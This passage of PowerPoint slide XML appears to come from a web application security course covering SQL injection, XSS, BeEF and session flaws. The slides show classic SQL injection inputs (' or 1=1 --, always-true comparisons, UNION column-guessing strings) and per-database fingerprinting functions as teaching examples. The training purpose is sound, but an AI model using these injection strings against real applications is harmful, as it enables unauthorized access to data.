              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> Prepared Files Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Blind SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> Blind SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> Persistent XSS Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Advanced XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> Durzosploit Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> XSS Frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t> BeEF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> BeEF Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Limiting XSS targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Session Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Session Fixation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> XSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> MonkeyFist Exercise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Putting It Together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Attack Scenario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Next Steps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Conclusions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191494"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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Conclusions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192515" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654570" y="1770090"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web applications are everywhere</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Consumer interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Within organizations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Easy to find developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Portable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Security is crucial</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28675"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94555"/>
            <a:ext cx="8458200" cy="41148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b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>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28678"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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Input is passed directly to query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Without filtering or with poor filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>User enters:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>' or 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Query becomes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>select user from users where login='' or 1=1 --'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is the traditional example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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Always True</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Another misconception is that 1=1 is a magic string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Its not!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Any always true value  is valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>1&lt;2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'Brenna'='Brenna'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>These exploit strings  are used to return entire data sets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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQL Review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Common SQL Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Select</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Retrieve data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Insert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Creates new data in database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Modifies existing data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Delete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Removes data from the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Union</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Combines the results of two queries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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Insert/Union Notes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1620190"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Attacker does not know schema or the actual query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Unless through other flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We need to guess the number of fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Add static fields till the query succeeds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Foo'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>);--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Foo'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>,1);--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Foo'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>,1,2);--</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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156150"/>
            <a:ext cx="8382000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fingerprinting the Database (1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="682050" y="1665160"/>
            <a:ext cx="7772400" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As we mentioned RDBMS' have differences in the SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We can use these differences to determine the database type if the error message doesn't</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Common, non-ANSI SQL statements (e.g. year)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>MS SQLServer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>year('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>2007-12-01') </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>EXTRACT(YEAR FROM '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>2007-12-01')   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" b="1" i="1" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>   to_char('2007-12-01','YYYY')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>PostgreSQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>date_part('year', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'2007-12-01')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQLite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>substr('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>2007-12-01',1,4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>year('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>2007-12-01')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
